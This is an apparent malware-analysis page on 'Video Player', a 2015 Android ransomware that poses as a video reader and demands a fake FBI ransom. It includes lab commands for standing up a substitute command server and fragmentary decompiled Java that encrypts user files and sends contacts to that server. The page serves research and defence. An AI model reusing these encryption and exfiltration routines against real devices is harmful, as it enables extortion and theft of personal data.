Steal, ransom, data encryption and phone locking

GroDDViewer graphs:


Video Player is a ransomware discovered in 2015. It encrypts user’s multimedia files stored, and can send a SMS to the user's contact to ask them to download the malware. The malware can steal user's contact, and user's SMS. The application takes the identity of government (FBI) to ask a ransom.

The application is a fake video reader. The interface is simple. The application can't read a video.

When the application is blocked, the application shows a message which said the user is "guilty to have pornographic file, it is forbidden by the US law, you must pay".

The application needs a server to execute the malicious code. However today the server is down so a fake server has been created to steal contacts.

Stage 1 : Configuration of the fake server

You must configure the phone, activate the tethering (Settings > More > Tethering & portable hotspot > USB tethering )

To configure the server, you need to do:

$ ifconfig (The interface usb0 has the IP1)
# echo 1 > /proc/sys/net/ipv4/ip_forward
adb shell
route add default gw IP1 dev rndis0
ip add IPserveur dev eth0
python 12449

Stage 2 : Communication between the client and the server

The client sends many requests to the server :

(POST to send informations of the phone
(GET to ask order. The client receives an identifiant of an order.
(GET is to confirme the order only. The client confirms the requete has been done with the answer status (code 200)

Other resources


To trigger the malware, launch the server and start the application


Malware type :

  • Ransomware

Attacks :

  •   Confidentiality

  •   Integrity

  •   Availability

  •   Normal use

Infection technique : Standalone application

Malicious code type :

  • Use Java code
  • Use native code

Hidding techniques :

  • Not hidden

Triggering techniques :

  • Executed at launch
  • Waits for a particular intent


Java source code extracts: The function which encrypt the file. The function which send the user's contacts. This an exemple of order.

  private static final byte[] salt = "ThisIsSalt".getBytes();  

  private static void EncryptFile(String paramString, Key paramKey, int paramInt)
    throws IOException, NoSuchAlgorithmException, NoSuchPaddingException, InvalidKeyException
    FileInputStream localFileInputStream = new FileInputStream(paramString);
    File localFile = new File(paramString + "_Enc");
    if (!localFile.exists()) {
    Object localObject = new FileOutputStream(localFile);
    Cipher localCipher = Cipher.getInstance("AES");
    localCipher.init(1, paramKey);
    paramKey = new CipherOutputStream((OutputStream)localObject, localCipher);
    localObject = new byte[paramInt];
    for (;;)
      int i =[])localObject, 0, paramInt);
      if (i == -1) {
      paramKey.write((byte[])localObject, 0, i);
    paramString = new File(paramString);

  private void getAndSendContactData()
    Object localObject = DataHelper.getContactList(this);
    ArrayList localArrayList = new ArrayList(((List)localObject).size());
    localObject = ((List)localObject).iterator();
    while (((Iterator)localObject).hasNext()) {
      localArrayList.add(new ContactEntry((Contact)((Iterator)localObject).next()));
    localObject = RequestFuture.newFuture();
    this.mRQ.add(new ContactsRequest(localArrayList, (Response.Listener)localObject, (Response.ErrorListener)localObject));
      ((RequestFuture)localObject).get(30L, TimeUnit.SECONDS);
      Log.d("CheckerSrv", "Contacts sending request succeeded");
    catch (Exception localException)
      Log.e("CheckerSrv", "Contacts sending request failed. " + localException.getLocalizedMessage());

public class CommandData
  int mId;
  public ActionType getActionType()
    return ActionType.forCommandId(this.mId);
  public int getId()
    return this.mId;